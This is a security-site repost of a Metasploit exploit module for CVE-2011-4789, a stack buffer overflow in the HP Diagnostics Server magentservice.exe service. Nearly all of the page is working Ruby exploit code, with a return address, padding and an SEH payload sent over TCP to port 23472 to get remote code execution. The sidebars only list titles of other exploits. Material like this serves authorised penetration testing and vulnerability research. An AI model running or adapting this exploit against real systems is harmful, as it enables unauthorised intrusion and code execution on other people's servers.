首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP Diagnostics Server magentservice.exe Overflow
来源:http://www.metasploit.com 作者:hal 发布时间:2012-02-01  
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::Tcp
 include Msf::Exploit::Remote::Seh
 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'HP Diagnostics Server magentservice.exe overflow',
   'Description'    => %q{
     This module exploits a stack buffer overflow in HP Diagnostics Server
    magentservice.exe service. By sending a specially crafted packet, an attacker
    may be able to execute arbitrary code. Originally found and posted by
    AbdulAziz Harir via ZDI.
   },
   'Author'         =>
    [
     'AbdulAziz Hariri', # Original discovery
     'hal',              # Metasploit module
    ],
   'License'        => MSF_LICENSE,
   'References'     =>
    [
     ['OSVDB', '72815'],
     ['CVE', '2011-4789'],
     ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-016/']
    ],
   'Privileged'     => true,
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'seh',
     'SSL' => true,
     'SSLVersion' => 'SSL3'
    },
   'Payload'        =>
    {
     'Space'    => 1000,
     'BadChars' => "\x00",
     'StackAdjustment' => -3500
    },
   'Platform'       => 'win',
   'DefaultTarget'  => 0,
   'Targets'        =>
    [
     [
      'Diagnostics Server 9.10',
      {
       # pop esi # pop ebx # ret 10
       # magentservice.exe
       'Ret' => 0x780c8f1f
      }
     ]
    ],
   'DisclosureDate' => 'Jan 12 2012'))
   register_options([Opt::RPORT(23472)], self.class)
 end
 def exploit
  req =  "\x00\x00\x00\x00"
  req << rand_text_alpha_upper(1092)
  req << generate_seh_payload(target.ret)
  connect
  sock.put(req)
  handler
  disconnect
 end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sysax Multi Server 5.50 Create
·MS12-004 midiOutPlayNextPolyEv
·HP Easy Printer Care XMLCacheM
·Tracker Software pdfSaver Acti
·zFTPServer Suite 6.0.0.52 'rmd
·sudo 1.8.0 - 1.8.3p1 Format St
·Acpid 1:2.0.10-1ubuntu2 Privil
·Adobe Flash Player MP4 Sequenc
·Linux/MIPS - reboot() - 32 byt
·EdrawSoft Office Viewer Compon
·Linux/MIPS - connect back shel
·Apache httpOnly Cookie Disclos
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved